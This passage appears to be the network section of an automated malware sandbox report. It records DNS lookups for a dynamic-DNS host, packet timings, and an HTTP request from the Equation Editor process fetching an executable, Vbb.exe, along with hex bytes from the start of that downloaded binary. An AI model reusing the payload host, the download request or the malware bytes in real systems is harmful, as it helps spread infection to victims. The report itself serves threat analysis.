                  Jan 26, 2021 09:22:05.803035021 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803066969 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803070068 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803107977 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803114891 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803155899 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803168058 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803194046 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803200960 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803234100 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803266048 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803283930 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803317070 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803318977 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803360939 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803364038 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803397894 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803411961 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803437948 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803442955 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803476095 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803488016 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803514004 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803520918 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803551912 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803580999 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803590059 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803590059 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803637981 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803638935 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803678989 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.803679943 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.803718090 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.806797028 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807140112 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807190895 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807229996 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807240963 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807257891 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807261944 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807266951 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807317019 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807317972 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807358980 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807360888 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807400942 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807400942 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807440042 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807451963 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807480097 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807481050 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807517052 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807518959 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807558060 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807562113 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807593107 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807598114 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807631969 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807641029 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807687044 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807693005 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807723999 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807728052 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807763100 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807765007 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807801008 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807805061 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807837963 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807842016 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807877064 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807879925 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807914019 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.807918072 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807960033 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.807961941 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808001995 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808005095 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808042049 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808043003 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808083057 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808084011 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808120966 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808121920 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808156967 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808160067 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808193922 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808195114 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808233976 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808234930 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808271885 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808280945 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808330059 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808350086 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808370113 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808381081 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808408022 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808409929 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808445930 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808448076 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808482885 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808485985 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808521032 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808521986 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808557987 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808557987 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808598995 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808604956 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808645964 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808646917 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808685064 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808686018 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808721066 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808723927 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808762074 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808763027 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808799028 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808800936 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808836937 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808837891 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808873892 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808875084 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808913946 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808923006 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.808963060 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.808964968 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809005022 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809005022 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809042931 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809043884 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809079885 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809084892 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809115887 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809120893 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809153080 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809154034 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809190989 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809191942 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809230089 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809238911 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809278011 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809282064 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809322119 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809329987 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809360981 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809360981 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809400082 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809437990 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809478998 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809479952 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809515953 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809516907 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809554100 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809556961 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809591055 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809592009 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809627056 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809638977 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809679985 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809709072 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809716940 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809719086 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809756994 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809756994 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809793949 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809794903 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809832096 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809848070 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809870005 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809870958 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809907913 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809909105 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809947014 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809956074 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.809997082 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.809998989 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810036898 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810048103 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810075045 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810075998 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810113907 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810113907 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810152054 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810153961 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810189962 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810190916 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810229063 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810230017 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810271978 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810286045 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810327053 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810328960 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810365915 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810370922 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810411930 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810446024 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810481071 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810483932 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810487032 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810522079 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810523987 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810561895 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810561895 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810602903 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810611010 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810647964 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810652971 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810689926 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810691118 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810729027 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810730934 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810767889 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810769081 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810806036 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810808897 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810844898 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810851097 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810882092 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810883045 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810924053 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810930967 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.810971975 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.810973883 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811012030 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811012030 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811049938 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811050892 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811090946 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811090946 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811144114 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811146021 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811182022 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811182022 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811219931 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811219931 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811256886 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811258078 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811296940 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811300039 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811337948 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811337948 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811377048 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811383963 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811424971 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811428070 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811465979 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811465979 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811506987 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811506987 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811542034 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:05.811546087 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:05.811580896 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:06.259185076 CET8049165198.23.207.63192.168.2.22
                  Jan 26, 2021 09:22:06.259394884 CET4916580192.168.2.22198.23.207.63
                  Jan 26, 2021 09:22:06.409775019 CET4916580192.168.2.22198.23.207.63

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 26, 2021 09:22:04.038271904 CET5219753192.168.2.228.8.8.8
                  Jan 26, 2021 09:22:04.331995010 CET53521978.8.8.8192.168.2.22
                  Jan 26, 2021 09:22:04.332540035 CET5219753192.168.2.228.8.8.8
                  Jan 26, 2021 09:22:04.391590118 CET53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 26, 2021 09:22:04.038271904 CET192.168.2.228.8.8.80xe19aStandard query (0)nop.myq-see.comA (IP address)IN (0x0001)
                  Jan 26, 2021 09:22:04.332540035 CET192.168.2.228.8.8.80xe19aStandard query (0)nop.myq-see.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 26, 2021 09:22:04.331995010 CET8.8.8.8192.168.2.220xe19aNo error (0)nop.myq-see.com198.23.207.63A (IP address)IN (0x0001)
                  Jan 26, 2021 09:22:04.391590118 CET8.8.8.8192.168.2.220xe19aNo error (0)nop.myq-see.com198.23.207.63A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • nop.myq-see.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165198.23.207.6380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Jan 26, 2021 09:22:04.551783085 CET0OUTGET /win/Vbb.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: nop.myq-see.com
                  Connection: Keep-Alive
                  Jan 26, 2021 09:22:04.691524982 CET2INHTTP/1.1 200 OK
                  Date: Tue, 26 Jan 2021 08:22:02 GMT
                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
                  Last-Modified: Mon, 25 Jan 2021 11:20:36 GMT
                  ETag: "bee00-5b9b7ba28300e"
                  Accept-Ranges: bytes
                  Content-Length: 781824
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 84 a9 0e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 54 0a 00 00 98 01 00 00 00 00 00 be 72 0a 00 00 20 00 00 00 80 0a 00 00 00 00 11 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 72 0a 00 4f 00 00 00 00 80 0a 00 50 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 52 0a 00 00 20 00 00 00 54 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 95 01 00 00 80 0a 00 00 96 01 00 00 56 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 ec 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 72 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 ec 00 00 64 ab 00 00 03 00 00 00 16 00 00 06 44 98 01 00 28 da 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1c 00 00 0a 2a 26 00 02 28 1d 00 00 0a 00 2a ce 73 1e 00 00 0a 80 01 00 00 04 73 1f 00 00 0a 80 02 00 00 04 73 20 00 00 0a 80 03 00 00 04 73 21 00 00 0a 80 04 00 00 04 73 22 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 23 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 26 00 02 28 28 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0a 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 08 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 5b 00 00 70 d0 06 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`PTr @@lrOP H.textR T `.rsrcPV@@.reloc @BrHdD((*&(*sss s!s"*0~o#+*0~o$+*0~o%+*0~o&+*0~o'+*&((*0<~(),!rp(*o+s,~+*0~+*"*0&(rEp~o-(.t$+*0<~(),!r[p
                  Jan 26, 2021 09:22:04.691554070 CET3INData Raw: 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 08 00 00 04 00 00 7e 08 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 09 00 00 04 0a 2b 00 06 2a 22 00 02 80 09 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0e
                  Data Ascii: (*o+s,~+*0~+*"*0&(rp~o-(.t$+*Vrprp*((*F(((&*0(/o0rp%H(1to2%
                  Jan 26, 2021 09:22:04.691570997 CET4INData Raw: 00 00 06 1f 7d 1f 14 73 4b 00 00 0a 6f 4c 00 00 0a 00 02 6f 1f 00 00 06 1b 6f 4d 00 00 0a 00 02 6f 1f 00 00 06 72 1f 01 00 70 6f 4f 00 00 0a 00 02 6f 21 00 00 06 28 42 00 00 0a 6f 50 00 00 0a 00 02 6f 21 00 00 06 18 6f 51 00 00 0a 00 02 6f 21 00
                  Data Ascii: }sKoLooMorpoOo!(BoPo!oQo!rp"@AsDoEo!(FoGo! sHoIo!rSpoJo!XsKoLo!oMo!rapoRo! oSo#(F
